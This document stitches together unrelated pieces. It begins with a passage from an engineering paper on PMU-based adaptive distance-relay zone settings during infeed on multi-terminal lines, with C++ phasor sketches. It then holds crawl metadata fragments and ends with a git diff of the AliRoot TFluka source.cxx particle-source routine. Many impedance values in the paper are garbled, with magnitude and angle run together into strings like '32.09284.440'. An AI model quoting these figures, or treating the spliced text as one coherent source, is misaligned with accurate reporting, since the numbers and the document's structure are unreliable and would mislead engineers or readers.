4.\n\nFurther, consider double line fault (LL) at 250 km from Bus B1 as given in Table 4. The impedance observed by the relay RA is 32.09284.440. The relay RA has seen the impedance in Zone-2 since the magnitude of the calculated impedance (|ZCalculated-2|) is less than 21.8388 (Condition 2). Therefore, the relay operates in Zone-2 rather than in Zone-1. Thus, the infeed at Bus B2 has caused the relay RA to mal-operate. A similar explanation holds good for LG, LLG & LLL faults at 250 km from Bus B1 as given in Table 4.\n\nFurthermore, consider the double line to ground fault (LLG) at 300 km from Bus B1 as given in Table 4. The impedance observed by the relay RA is 48.13680.370. The relay RA has seen the impedance neither in Zone-1 nor in Zone-2 since the magnitude of the calculated impedance (|Z Calculated|) is higher than 21.8388 (Condition 2). Therefore, the relay does not operate since the observed impedance has fallen out of its zone settings. Thus, the infeed at Bus B2 has caused the relay RA to mal-operate. A similar explanation holds good for LG, LL & LLL faults at 350 km from Bus B1 as given in Table 4. 
The fault conditions for all the cases are shown in Table 4 considering a fault resistance of 0.2 Ω at the fault point.\n\nTables 5 and 6 show similar case studies as discussed in Table 4 but with different FR of 1.7 Ω and 4.9 Ω respectively. From tables, it is clear that with the change in FR the relay RA malfunctions for many cases because of infeed condition at Bus B2. Few cases are discussed below.\n\nConsider double line fault (LL) at 250 km from Bus B1 as given in Table 5. The impedance observed by the relay RA is 32.09284.440. The relay RA has seen the impedance in Zone-2 since the magnitude of the calculated impedance (|Z Calculated-2|) is less than 21.8388 (Condition 2). Therefore, the relay operates in Zone-2 rather than in Zone-1. Thus, the infeed at Bus B2 has caused the relay RA to mal-operate. Figure 11 displays the LabVIEW front panel for relay RA in PDC at SPC (without the proposed methodology). The LabVIEW front panel displays glowing LED for Zone-2 fault. Figure 11 also shows the voltage and current phasor data acquired from PMUs at B1 and B4 and the calculated impedance.\n\nConsider a double line to ground fault (LLG) with FR of 4.9 Ω at 350 km from Bus B1 as given in Table 6. The impedance observed by the relay RA is 80.33568.630.\n\nThe relay RA malfunctions because the impedance observed by the relay is greater than 21.8388 (distance from the center of the Zone-2 circle to the fault point). A LabVIEW front panel display for this case study is shown in Fig. 12. Figure 12 also displays the LabVIEW front panel for relay RA in PDC (without the proposed methodology). The voltage and current phasor data acquired from PMUs at B1 and B4, and the calculated impedances are also shown in Fig. 12.\n\nThe subsequent section presents the performance of the distance relay RA when the proposed methodology has been implemented at SPC.\n\n### Real-time performance analysis of the conventional distance relay with PAZSD methodology\n\nThe following conditions are used to detect the zone of fault point using the proposed PAZSD methodology.\n\n$$\\mathrm{Zone}\\hbox{-} 1:\\kern1em \\mathrm{If}\\mid {\\mathrm{Z}}_{\\mathrm{Calculate}\\hbox{-} 1}\\mid <\\left(|{\\mathrm{Z}}_{\\mathrm{new}}{\\_}_{\\mathrm{Z}\\mathrm{one}1}|/2\\right)$$\n(3)\n$$\\mathrm{Zone}\\hbox{-} 2:\\kern1em \\mathrm{If}\\ \\left(|{\\mathrm{Z}}_{\\mathrm{new}}{\\_}_{\\mathrm{Z}\\mathrm{one}1}|/2\\right)<\\mid {\\mathrm{Z}}_{\\mathrm{Calculated}\\hbox{-} 2}\\mid <\\left(|{\\mathrm{Z}}_{\\mathrm{new}}{\\_}_{\\mathrm{Z}\\mathrm{one}2}/2\\right)$$\n(4)\n\nIn this subsection, the enhanced functioning of the distance relay RA with PAZSD methodology for the same case studies (studied in subsection 4.1) is discussed. The new zone settings of the relay RA using the current coefficients (K1, K2 & K3) for different faults with different fault conditions are tabulated in Tables 7, 8 and 9.\n\nFrom Table 7, for the LG with the same fault conditions as discussed in subsection 4.1, the current coefficients K1, K2 & K3 estimated by the proposed methodology are 1.2656, 1.6712 & 1.5703 respectively. Since K2 > (K1 & K3), the new zone settings of the relay RA as per the proposed methodology are 38.93060.36° and 72.99460.36°. For this condition, the impedance observed by the relay RA is 4.01163.5990. The zone of fault detection is Zone-1 since the magnitude of the observed value is less than 18.29 (Condition 3). Therefore, the operation of the relay RA with new zone settings is same as with the old zone settings. 
Figure 13 displays the LabVIEW front panel for relay RA in PDC at SPC (with the proposed methodology). The LabVIEW front panel displays glowing LED against Zone-1 fault. Figure 13 also shows the voltage and current phasors acquired from PMUs at B1 and B4 and the calculated impedance. A similar explanation holds good for LL fault at 50 km, and LLG & LLL faults at 150 km from bus B1 as given in Table 7.\n\nSimilarly, for double line fault (LL) with the same fault conditions as discussed in subsection 4.1, the current coefficients K1, K2 & K3 estimated by the proposed methodology are 4.3359, 5.1328 and 2.0313 respectively. The new zone settings of the relay RA as per the proposed methodology are 119.56760.36° and 224.18860.36° as K2 > (K1 & K3). For this condition, the impedance observed by the relay RA is 32.09284.440. The relay RA has seen the impedance in Zone-1 since the magnitude of the calculated impedance (|ZCalculated-1|) is less than 59.7835 (Condition 3). Therefore, the relay operates correctly, i.e. in Zone-1 whereas without the proposed methodology the relay RA operates in Zone-2. Thus, the effect of the infeed on the relay RA performance has been eliminated by the proposed methodology. A similar explanation holds good for LG, LL, LLG & LLL faults at 250 km from bus B1 as given in Table 4. Likewise, for double line to ground fault (LLG) with the same fault conditions as discussed in subsection 4.1, the current coefficients K1, K2 & K3 estimated by the proposed methodology are 2.4688, 4.0469 and 4.375 respectively. Since K3 > (K2 & K1), the new zone settings of the relay RA using 4.375 are 101.91460.36° and 191.09060.36°. The impedance observed by the relay RA is 48.13680.370.\n\nThe relay RA has seen the impedance in Zone-1 since the magnitude of the calculated impedance (|Z Calculated-1|) is less than 50.957 (Condition 3). Therefore, the relay does operate correctly, i.e. in Zone-1 whereas without the proposed methodology the relay RA does not operate. Thus, the infeed at Bus B2 has not affected the performance of the relay RA. A similar explanation holds good for LG, LL & LLL faults at 350 km from Bus B1 as given in Table 7. The fault conditions for all the cases are shown in Table 7 considering a FR of 0.2 Ω at the fault point.\n\nTables 8 and 9 show similar case studies as considered in Table 7 but with FR of 1.7 Ω and 4.9 Ω respectively. From tables, it is clear that with a change in FR the relay RA with the proposed methodology functions correctly for all the cases regardless of the infeed condition at Bus B2. Few cases are discussed below for better understanding.\n\nFrom Table 8, consider double line fault (LL) with the same fault conditions as discussed in subsection 4.1 (Table 5). The current coefficients K1, K2 & K3 estimated by the proposed methodology are 4.3359, 5.1328 and 2.0312 respectively. The new zone settings of the relay RA as per the proposed methodology are 119.55860.36° and 224.19160.36° as K2 > (K1 & K3). The impedance observed by the relay RA is 31.75 − 275.120. The relay RA has seen the impedance in Zone-1 because the magnitude of the calculated impedance (|Z Calculated-1|) is less than 59.77 (Condition 3). Therefore, the relay RA with the proposed methodology does operate in the right zone, i.e. Zone-1 whereas without the proposed methodology the relay RA operates in Zone-2. Thus, the mal-operation of the relay RA is averted. Figure 14 displays the LabVIEW front panel for relay RA in PDC at SPC (with the proposed methodology). 
The LabVIEW front panel displays glowing LED for Zone-1 fault. Figure 14 also shows the voltage and current phasor data acquired from PMUs at B1 and B4 and the calculated impedance. The fault conditions for all the cases are shown in Table 8 considering a FR of 1.7 Ω at the fault point.\n\nConsider LLG fault with FR of 4.9 Ω at 350 km from Bus B1 as given in Table 9. The current coefficients K1, K2 & K3 estimated by the proposed methodology are 4.3359, 4.75 and 5.0547 respectively. The new zone settings of the relay RA as per the proposed methodology are 117.74860.36° and 220.77760.36° as K3 > (K1 & K2). The impedance observed by the relay RA is 80.61468.660. The relay RA has seen the impedance in Zone-2 since the magnitude of the calculated impedance (|Z Calculated-2|) is less than 110.389 (Condition 4). Therefore, the relay RA with the proposed methodology does operate in the right zone, i.e., Zone-2 whereas without the proposed methodology the relay RA does not operate. The LabVIEW front panel display for LLG fault with FR of 4.9 Ω at 350 km from Bus B1 is shown in Fig. 15. Figure 15 also displays the LabVIEW front panel for relay RA in PDC at SPC (with the proposed methodology). The voltage and current phasor data acquired from PMUs at B1 and B4, and the calculated impedances are also shown in Fig. 15. The fault conditions for all the cases are shown in Table 9 considering an FR of 4.9 Ω at the fault point.\n\nThus, from the above elaborated discussion, it is clear that the proposed PAZSD methodology has improved the performance of the conventional distance relay.\n\n### Reliability analysis of the conventional distance protection without and with the proposed methodology\n\nDespite the simple and dependable performance of the conventional distance protective system, the reliability of distance protection is affected when infeed condition exists in MTLs. In-feed conditions jeopardize security in the power system due to the non-adaptive property of distance protection system and provide an obscure view of the system conditions. Further, the function of the conventional distance protection may not be accurate for faults with different fault impedances.\n\nThe reliability attribute of the conventional distance protection with and without the proposed PAZSD methodology has been analyzed in this section as per the definition of reliability .\n\nFrom Table 4, for instance, when an LL fault occurred at 50 km from Bus B1, the relay RA (without the proposed PAZSD methodology) has observed the fault point in Zone-1 which shows that the relay RA operates correctly as per zone settings. Thus, the reliability attribute of the relay has not been influenced by the infeed at Bus B2.\n\nSimilarly, the reliability of the relay had not influenced by the infeed when LG at 50 km, LLG & LLL faults at 150 km from Bus B1 are separately created as given in Table 4. However, when LG fault occurred at 250 km from Bus B1, the relay RA has observed the fault in Zone-2, even though the fault is in Zone-1. Thus, the FR has influenced the reliability of the relay RA. A similar explanation holds good for LG, LL, LLG & LLL faults at 250 km from Bus B1 as given in Table 4. Likewise, when the double line to ground fault (LLG) occurred at 300 km from Bus B1, the relay RA has seen the impedance neither in Zone-1 nor Zone-2. Thus, the infeed at Bus B2 and FR has influenced the reliability of the relay RA. 
A similar explanation holds good for LG, LL & LLL faults at 350 km from Bus B1 as given in Table 4.\n\nSimilarly, Tables 5 and 6 show similar case studies as discussed in Table 4 but with FR of 1.7 Ω and 4.9 Ω respectively. From tables, it is clear that with the change in FR, the reliability of the relay RA has been influenced by many cases because of infeed at Bus B2. However, from Table 7, for the same fault conditions as discussed in Table 4, the reliability of the relay RA has been improved by the proposed PAZSD methodology by changing the zone settings adaptively as per the requirement. Likewise, the reliability of the relay RA has been improved by the proposed methodology for all the case studies as tabulated in Tables 8 to 9.\n\nThe above concise discussion underlines the importance of the proposed methodology in improving the reliability of conventional distance protection during infeed condition and impedance faults in MTLs.\n\n## Conclusions\n\nThis paper proposed a PMU based methodology for adaptive zone settings of distance relays to improve the performance and reliability of distance protection. The operation of distance relays during infeed condition with and without the proposed methodology has been demonstrated through a four-bus model implemented in PSCAD/EMTDC environment. Further, a laboratory prototype of EHV MTLs is considered to validate the performance of distance relays during infeed condition. The PAZSD methodology employs current coefficients to adjust the zone settings of the relays during infeed situations. The results strongly convey that the proposed PAZSD methodology is effective in improving the performance and reliability of distance protection during infeed condition.\n\n## References\n\n1. 1.\n\nAl-Emadi, N. A., Ghorbani, A., & Mehrjerdi, H. (2016). Synchrophasor-based backup distance protection of multi-terminal transmission lines. IET Generation, Transmission & Distribution, 10(13), 3304–3313.\n\n2. 2.\n\nAbe, M., Otsuzuki, N., Emura, T., & Takeuchi, M. (1995). Development of a new fault location system for multi-terminal single transmission lines. IEEE Transactions on Power Delivery, 10(1), 159–168.\n\n3. 3.\n\nNagasawa, T., Abe, M., Otsuzuki, N., Emura, T., Jikihara, Y., & Takeuchi, M. (1991). Development of a new fault location algorithm for multi-terminal two parallel transmission lines (pp. 348–362). Dallas, TX: Proceedings of the 1991 IEEE Power Engineering Society Transmission and Distribution Conference.\n\n4. 4.\n\nFunabashi, T., Otoguro, H., Mizuma, Y., Dube, L., & Ametani, A. (2000). Digital fault location for parallel double-circuit multi-terminal transmission lines. IEEE Transactions on Power Delivery, 15(2), 531–537.\n\n5. 5.\n\nQiu, Z., Xu, Z., & Wang, G. (2006). Relay protection for multi-terminal lines based on multi-agent technology (pp. 7670–7673). Dalian: 6th World Congress on Intelligent Control and Automation.\n\n6. 6.\n\nGajic, Z., Brncic, I., & Rios, F. (2010). Multi-terminal line differential protection with innovative charging current compensation algorithm. 10th IET international conference on developments in power system protection (DPSP 2010) (pp. 1–5). Manchester: Managing the Change.\n\n7. 7.\n\nForford, T., Messing, L., & Stranne, G. (2004). An analogue multi-terminal line differential protection. 8th IEE International Conference on Developments in Power System Protection, 2, 399–403.\n\n8. 8.\n\nArbes, J. (1989). Differential line protection application to multi-terminal lines (pp. 121–124). 
Edinburgh: 1989 4th International Conference on Developments in Power Protection.\n\n9. 9.\n\nAl-Fakhri, B. (2004). The theory and application of differential protection of multi-terminal lines without synchronization using vector difference as restraint quantity - simulation study. Eighth IEE International Conference on Developments in Power System Protection, 2, 404–409.\n\n10. 10.\n\nHussain, S., & Osman, A. H. (2016). Fault location scheme for multi-terminal transmission lines using unsynchronized measurements. International Journal of Electrical Power & Energy Systems, 78, 277–284.\n\n11. 11.\n\nNgu, E. E., & Ramar, K. (2011). A combined impedance and traveling wave based fault location method for multi-terminal transmission lines. International Journal of Electrical Power & Energy Systems, 33(10), 1767–1775.\n\n12. 12.\n\nZhu, Y., & Fan, X. (2013). Fault location scheme for a multi-terminal transmission line based on current traveling waves. International Journal of Electrical Power & Energy Systems, 53, 367–374.\n\n13. 13.\n\nLien, K.-P., Liu, C.-W., Jiang, J. A., Chen, C.-S., & Yu, C.-S. (2005). A novel fault location algorithm for multi-terminal lines using phasor measurement units (pp. 576–581). Proceedings of the 37th Annual North American power symposium.\n\n14. 14.\n\nBrahma, S. M. (2005). Fault location scheme for a multi-terminal transmission line using synchronized voltage measurements. IEEE Transactions on Power Delivery, 20(2), 1325–1331.\n\n15. 15.\n\nWu, T., Chung, C. Y., Kamwa, I., Li, J., & Qin, M. (2016). Synchrophasor measurement-based fault location technique for multi-terminal multi-section non-homogeneous transmission lines. IET Generation, Transmission & Distribution, 10(8), 1815–1824.\n\n16. 16.\n\nAIEE committee report. (1961). Protection of multiterminal and tapped lines. Transactions of the American Institute of Electrical Engineers. Part III: Power Apparatus and Systems, 80(3), 55–65.\n\n17. 17.\n\nMir, M., & Hasan Imam, M. (1989). Limits to zones of simultaneous tripping in multi-terminal lines (pp. 326–330). Edinburgh: 4th International Conference on Developments in Power Protection.\n\n18. 18.\n\nDinh, M. T. N., Bahadornejad, M., Shahri, A. S. A., & Nair, N. K. C. (2013). Protection schemes and fault location methods for multi-terminal lines: A comprehensive review (pp. 1–6). Bangalore: IEEE Innovative Smart Grid Technologies-Asia (ISGT Asia).\n\n19. 19.\n\nPhadke, A. G., & Thorpe, J. S. (2008). Synchronized phasor measurements and their applications. Springer: Power electronics and power systems series.\n\n## Author information\n\nBM has developed and implemented the proposed algorithm in hardware and simulation. Mr. Shanmukesh contributed towards hardware implementation and Mr. Anmol has contributed to develop the four bus power system model in PSCAD. MJBR has been the technical adviser for the total work and DKM has supported us in interpreting the simulation results and hardware results for eliminating the infeed effect in MTL. All authors have read and approved the final manuscript.\n\nCorrespondence to Maddikara Jaya Bharata Reddy.\n\n## Ethics declarations\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n## Rights and permissions", null, "" ]
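As a supplement to the Synchrophasor Technology section above, the one-cycle DFT phasor estimate of Eq. (1) (with k = 1) can be sketched in a few lines. The C++ fragment below is an illustration under the paper's stated assumptions (N samples spanning exactly one nominal cycle, e.g. N = 40 for 2 kHz sampling of the 50 Hz laboratory prototype); it is not the authors' LabVIEW FPGA implementation.

```cpp
#include <cmath>
#include <complex>
#include <cstdio>
#include <vector>

// One-cycle DFT estimate of the fundamental phasor, following Eq. (1) with k = 1.
// samples: N samples covering exactly one nominal cycle of the voltage or current signal.
std::complex<double> fundamentalPhasor(const std::vector<double>& samples) {
    const std::size_t N = samples.size();
    const double pi = std::acos(-1.0);
    std::complex<double> X(0.0, 0.0);
    for (std::size_t n = 0; n < N; ++n) {
        const double theta = 2.0 * pi * static_cast<double>(n) / static_cast<double>(N);
        X += samples[n] * std::complex<double>(std::cos(theta), -std::sin(theta));
    }
    return std::sqrt(2.0) / static_cast<double>(N) * X;   // sqrt(2)/N scaling as in Eq. (1)
}

int main() {
    // Synthesize one 50 Hz cycle sampled at 2 kHz (N = 40), peak 100, phase +30 degrees.
    const std::size_t N = 40;
    const double pi = std::acos(-1.0);
    std::vector<double> x(N);
    for (std::size_t n = 0; n < N; ++n)
        x[n] = 100.0 * std::cos(2.0 * pi * static_cast<double>(n) / static_cast<double>(N) + pi / 6.0);

    const std::complex<double> X = fundamentalPhasor(x);
    std::printf("magnitude = %.3f, angle = %.1f deg\n", std::abs(X), std::arg(X) * 180.0 / pi);
    // Expected roughly 70.711 (= 100 / sqrt(2)) and +30 deg.
    return 0;
}
```

Because of the sqrt(2)/N scaling in Eq. (1), the returned magnitude is the RMS value of the fundamental component, which is the quantity the relays and the PDC work with.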
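Similarly, Steps 2-3 of the PAZSD methodology (Eqs. (5)-(11)) amount to a small amount of arithmetic on phasor magnitudes in the PDC: compute the per-phase coefficients and scale the old reach settings by the largest of the three, which is also the common value when K1, K2 and K3 are nearly equal. The C++ sketch below illustrates that logic with hypothetical PMU current magnitudes; the Zone-1 reach used is the one implied by the four-bus example (about 6.55 + j83.44 ohm, i.e. 80% of a 350 km line at 0.0234 + j0.298 ohm/km). It is not the authors' PDC code.

```cpp
#include <algorithm>
#include <complex>
#include <cstdio>

struct ThreePhase { double R, Y, B; };   // phase-current magnitudes |I_R|, |I_Y|, |I_B|

// Eqs. (5)-(7): per-phase infeed coefficients from the magnitudes measured at
// bus i (relay end) and bus k (infeed end).
ThreePhase infeedCoefficients(const ThreePhase& Ii, const ThreePhase& Ik) {
    return { (Ii.R + Ik.R) / Ii.R,
             (Ii.Y + Ik.Y) / Ii.Y,
             (Ii.B + Ik.B) / Ii.B };
}

// Eqs. (8)-(11): scale an old zone reach setting by the selected coefficient
// (the largest of K1, K2, K3; with near-equal coefficients this is the common value).
std::complex<double> newZoneSetting(const std::complex<double>& zOld, const ThreePhase& K) {
    const double k = std::max({K.R, K.Y, K.B});
    return k * zOld;
}

int main() {
    // Hypothetical fault-time current magnitudes (A) from the PMUs at bus i and bus k.
    const ThreePhase Ii = {520.0, 515.0, 480.0};
    const ThreePhase Ik = {430.0, 420.0, 410.0};

    const ThreePhase K = infeedCoefficients(Ii, Ik);
    std::printf("K1 = %.3f  K2 = %.3f  K3 = %.3f\n", K.R, K.Y, K.B);

    // Zone-1 reach of relay R12 in the four-bus example: 80% of 350 km at 0.0234 + j0.298 ohm/km.
    const std::complex<double> zone1Old(6.552, 83.44);
    const std::complex<double> zone1New = newZoneSetting(zone1Old, K);
    std::printf("Zone-1: old %.3f + j%.3f -> new %.3f + j%.3f\n",
                zone1Old.real(), zone1Old.imag(), zone1New.real(), zone1New.imag());
    return 0;
}
```

With these made-up magnitudes the largest coefficient is K3 of roughly 1.85, so the Zone-1 reach is widened by almost the same factor as in the K3 = 1.9 case reported for the four-bus RYG fault.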
[ null, "https://pcmp.springeropen.com/track/article/10.1186/s41601-018-0087-z", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9157321,"math_prob":0.9222177,"size":39827,"snap":"2019-51-2020-05","text_gpt3_token_len":9555,"char_repetition_ratio":0.1935816,"word_repetition_ratio":0.29776406,"special_character_ratio":0.24229793,"punctuation_ratio":0.13147818,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97622776,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-08T14:26:15Z\",\"WARC-Record-ID\":\"<urn:uuid:7334b28a-52b8-4ed5-b997-f4b0d74790d3>\",\"Content-Length\":\"235852\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b06d4769-1152-477f-b2a3-729742da4014>\",\"WARC-Concurrent-To\":\"<urn:uuid:aee97bdc-5fa4-4bcf-831e-d36b62c81293>\",\"WARC-IP-Address\":\"151.101.248.95\",\"WARC-Target-URI\":\"https://pcmp.springeropen.com/articles/10.1186/s41601-018-0087-z\",\"WARC-Payload-Digest\":\"sha1:CAG3ON2INPEQWOEJTBB5MLJLXC3H7D6G\",\"WARC-Block-Digest\":\"sha1:FX5XEBXKNNH6KNFF4FFKVN7XZSAQPXLE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540510336.29_warc_CC-MAIN-20191208122818-20191208150818-00244.warc.gz\"}"}
http://git.uio.no/git/?p=u/mrichter/AliRoot.git;a=blobdiff;f=TFluka/source.cxx;h=7720669332a4c84966d8a3a3119e91108ea686ed;hp=ccb3dc73f6e6f165531c3ee9c7701143ee57cf5a;hb=ce60a1360da75d567bf1e946e5d24c7a5eb668e2;hpb=f55b9162da6c2a42c51854272ad118ea8ca81f1c;ds=sidebyside
[ "index ccb3dc73f6e6f165531c3ee9c7701143ee57cf5a..7720669332a4c84966d8a3a3119e91108ea686ed 100644 (file)\n@@ -66,51 +66,58 @@ extern \"C\" {\n\nvoid source(Int_t& nomore) {\n#ifdef METHODDEBUG\n\nvoid source(Int_t& nomore) {\n#ifdef METHODDEBUG\n-    cout << \"==> source(\" << nomore << \")\" << endl;\n+      cout << \"==> source(\" << nomore << \")\" << endl;\n#endif\n\n#endif\n\n-    cout << \"\\t* EPISOR.lsouit = \" << (EPISOR.lsouit?'T':'F') << endl;\n-\n-    static Bool_t lfirst = true;\n-    /*======================================================================*\n-     *                                                                      *\n-     *                 BASIC VERSION                                        *\n-     *                                                                      *\n-     *======================================================================*/\n-    nomore = 0;\n-    /*  +-------------------------------------------------------------------*\n-     *  |  First call initializations:*/\n-    if (lfirst) {\n+      cout << \"\\t* EPISOR.lsouit = \" << (EPISOR.lsouit?'T':'F') << endl;\n\n-      /*|  *** The following 3 cards are mandatory ***/\n+      static Bool_t lfirst = true;\n+      static Bool_t particleIsPrimary = true;\n+      static Bool_t lastParticleWasPrimary = true;\n+\n+      /*  +-------------------------------------------------------------------*\n+       *    First call initializations for FLUKA:                             */\n\n-      EPISOR.tkesum = zerzer;\n-      lfirst = false;\n-      EPISOR.lussrc = true;\n-      /*|  *** User initialization ***/\n-    } else {\n-           TVirtualMCApplication::Instance()->PostTrack();\n-           TVirtualMCApplication::Instance()->FinishPrimary();\n-    }\n-\n-\n-    /*  |\n-     *  +-------------------------------------------------------------------*\n-     *  Push one source particle to the stack. Note that you could as well\n-     *  push many but this way we reserve a maximum amount of space in the\n-     *  stack for the secondaries to be generated\n-     */\n\n+    nomore = 0;\n// Get the pointer to the VMC\nTVirtualMC* fluka = TFluka::GetMC();\n// Get the pointer to the VMC\nTVirtualMC* fluka = TFluka::GetMC();\n-    // Get the stack produced from the generator\n+    // Get the stack\nTVirtualMCStack* cppstack = fluka->GetStack();\nTVirtualMCStack* cppstack = fluka->GetStack();\n-    //Get next particle\n+    TParticle* particle;\nInt_t itrack = -1;\nInt_t itrack = -1;\n-    TParticle* particle = cppstack->PopNextTrack(itrack);\n+    Int_t  nprim  = cppstack->GetNprimary();\n+//  Get the next particle from the stack\n+    particle  = cppstack->PopNextTrack(itrack);\n+\n+//  Is this a secondary not handled by Fluka, i.e. a particle added by user action ?\n+    lastParticleWasPrimary = particleIsPrimary;\n+\n+    if (itrack >= nprim) {\n+       particleIsPrimary = kFALSE;\n+    } else {\n+       particleIsPrimary = kTRUE;\n+    }\n+\n+//    printf(\"--->Got Particle %d %d %d\\n\", itrack, particleIsPrimary, lastParticleWasPrimary);\n+\n+    if (lfirst) {\n+       EPISOR.tkesum = zerzer;\n+       lfirst = false;\n+       EPISOR.lussrc = true;\n+    } else {\n+//\n+// Post-track actions for primary track\n+//\n+       if (particleIsPrimary) {\n+           TVirtualMCApplication::Instance()->PostTrack();\n+           TVirtualMCApplication::Instance()->FinishPrimary();\n+       }\n+    }\n\n//Exit if itrack is negative (-1). 
Set lsouit to false to mark last track for\n//this event\n\n//Exit if itrack is negative (-1). Set lsouit to false to mark last track for\n//this event\n+\nif (itrack<0) {\nnomore = 1;\nEPISOR.lsouit = false;\nif (itrack<0) {\nnomore = 1;\nEPISOR.lsouit = false;\n@@ -121,14 +128,18 @@ extern \"C\" {\n#endif\nreturn;\n}\n#endif\nreturn;\n}\n-\n+\n//Get some info about the particle and print it\n//Get some info about the particle and print it\n+    //\n+    //pdg code\n+    Int_t pdg = particle->GetPdgCode();\n+\nTVector3 polarisation;\nparticle->GetPolarisation(polarisation);\ncout << \"\\t* Particle \" << itrack << \" retrieved...\" << endl;\ncout << \"\\t\\t+ Name = \" << particle->GetName() << endl;\nTVector3 polarisation;\nparticle->GetPolarisation(polarisation);\ncout << \"\\t* Particle \" << itrack << \" retrieved...\" << endl;\ncout << \"\\t\\t+ Name = \" << particle->GetName() << endl;\n-    cout << \"\\t\\t+ PDG/Fluka code = \" << particle->GetPdgCode()\n-        << \" / \" << fluka->IdFromPDG(particle->GetPdgCode()) << endl;\n+    cout << \"\\t\\t+ PDG/Fluka code = \" << pdg\n+        << \" / \" << fluka->IdFromPDG(pdg) << endl;\ncout << \"\\t\\t+ P = (\"\n<< particle->Px() << \" , \"\n<< particle->Py() << \" , \"\ncout << \"\\t\\t+ P = (\"\n<< particle->Px() << \" , \"\n<< particle->Py() << \" , \"\n@@ -139,60 +150,70 @@ extern \"C\" {\n*/\n\nSTACK.lstack++;\n*/\n\nSTACK.lstack++;\n-    //cout << \"\\t* Storing particle parameters in the stack, lstack = \"\n-    //  << STACK.lstack << endl;\n+\n/* Wt is the weight of the particle*/\nSTACK.wt[STACK.lstack] = oneone;\nSTARS.weipri += STACK.wt[STACK.lstack];\n/* Wt is the weight of the particle*/\nSTACK.wt[STACK.lstack] = oneone;\nSTARS.weipri += STACK.wt[STACK.lstack];\n+\n/* Particle type (1=proton.....). Ijbeam is the type set by the BEAM\n* card\n*/\n/* Particle type (1=proton.....). 
Ijbeam is the type set by the BEAM\n* card\n*/\n+\n//STACK.ilo[STACK.lstack] = BEAM.ijbeam;\n//STACK.ilo[STACK.lstack] = BEAM.ijbeam;\n-    STACK.ilo[STACK.lstack] = fluka-> IdFromPDG(particle->GetPdgCode());\n+    if (pdg == 50000050 ||  pdg ==  50000051) {\n+       STACK.ilo[STACK.lstack] = fluka-> IdFromPDG(22);\n+    } else {\n+       STACK.ilo[STACK.lstack] = fluka-> IdFromPDG(pdg);\n+    }\n+\n+\n+\n+\n/* From this point .....\n* Particle generation (1 for primaries)\n/* From this point .....\n* Particle generation (1 for primaries)\n-       */\n+    */\nSTACK.lo[STACK.lstack] = 1;\nSTACK.lo[STACK.lstack] = 1;\n+\n/* User dependent flag:*/\nSTACK.louse[STACK.lstack] = 0;\n/* User dependent flag:*/\nSTACK.louse[STACK.lstack] = 0;\n+\n/* User dependent spare variables:*/\nInt_t ispr = 0;\nfor (ispr = 0; ispr < mkbmx1; ispr++)\nSTACK.sparek[STACK.lstack][ispr] = zerzer;\n/* User dependent spare variables:*/\nInt_t ispr = 0;\nfor (ispr = 0; ispr < mkbmx1; ispr++)\nSTACK.sparek[STACK.lstack][ispr] = zerzer;\n+\n/* User dependent spare flags:*/\nfor (ispr = 0; ispr < mkbmx2; ispr++)\nSTACK.ispark[STACK.lstack][ispr] = 0;\n/* User dependent spare flags:*/\nfor (ispr = 0; ispr < mkbmx2; ispr++)\nSTACK.ispark[STACK.lstack][ispr] = 0;\n+\n/* Save the track number of the stack particle:*/\nSTACK.ispark[STACK.lstack][mkbmx2-1] = itrack;\nSTACK.nparma++;\nSTACK.numpar[STACK.lstack] = STACK.nparma;\nSTACK.nevent[STACK.lstack] = 0;\nSTACK.dfnear[STACK.lstack] = +zerzer;\n/* Save the track number of the stack particle:*/\nSTACK.ispark[STACK.lstack][mkbmx2-1] = itrack;\nSTACK.nparma++;\nSTACK.numpar[STACK.lstack] = STACK.nparma;\nSTACK.nevent[STACK.lstack] = 0;\nSTACK.dfnear[STACK.lstack] = +zerzer;\n-      /* ... to this point: don't change anything\n-       * Particle age (s)\n-       */\n+\n+    /* Particle age (s)*/\nSTACK.agestk[STACK.lstack] = +zerzer;\nSTACK.aknshr[STACK.lstack] = -twotwo;\nSTACK.agestk[STACK.lstack] = +zerzer;\nSTACK.aknshr[STACK.lstack] = -twotwo;\n+\n/* Group number for \"low\" energy neutrons, set to 0 anyway*/\nSTACK.igroup[STACK.lstack] = 0;\n/* Group number for \"low\" energy neutrons, set to 0 anyway*/\nSTACK.igroup[STACK.lstack] = 0;\n-    /* Kinetic energy of the particle (GeV)*/\n-    //STACK.tke[STACK.lstack] =\n-    //sqrt( BEAM.pbeam*BEAM.pbeam +\n-    // PAPROP.am[BEAM.ijbeam+6]*PAPROP.am[BEAM.ijbeam+6] )\n-    //- PAPROP.am[BEAM.ijbeam+6];\n-    STACK.tke[STACK.lstack] = particle->Energy() - particle->GetMass();\n+\n+    /* Kinetic energy */\n+    if (pdg == 50000050 ||  pdg ==  50000051) {\n+       //\n+       // Special case for optical photons\n+       STACK.tke[STACK.lstack] = particle->Energy();\n+    } else {\n+       STACK.tke[STACK.lstack] = particle->Energy() - particle->GetMass();\n+    }\n+\n\n/* Particle momentum*/\n\n/* Particle momentum*/\n-    //STACK.pmom [STACK.lstack] = BEAM.pbeam;\nSTACK.pmom [STACK.lstack] = particle->P();\n\nSTACK.pmom [STACK.lstack] = particle->P();\n\n-    /*     PMOM (lstack) = SQRT ( TKE (stack) * ( TKE (lstack) + TWOTWO\n-     *    &                     * AM (ILO(lstack)) ) )\n-     * Cosines (tx,ty,tz)\n-     */\n-    //STACK.tx [STACK.lstack] = BEAM.tinx;\n-    //STACK.ty [STACK.lstack] = BEAM.tiny;\n-    //STACK.tz [STACK.lstack] = BEAM.tinz;\n+    /* Cosines (tx,ty,tz)*/\nDouble_t cosx = particle->Px()/particle->P();\nDouble_t cosy = particle->Py()/particle->P();\nDouble_t cosz = TMath::Sqrt(oneone - cosx*cosx - cosy*cosy);\nDouble_t cosx = particle->Px()/particle->P();\nDouble_t cosy = 
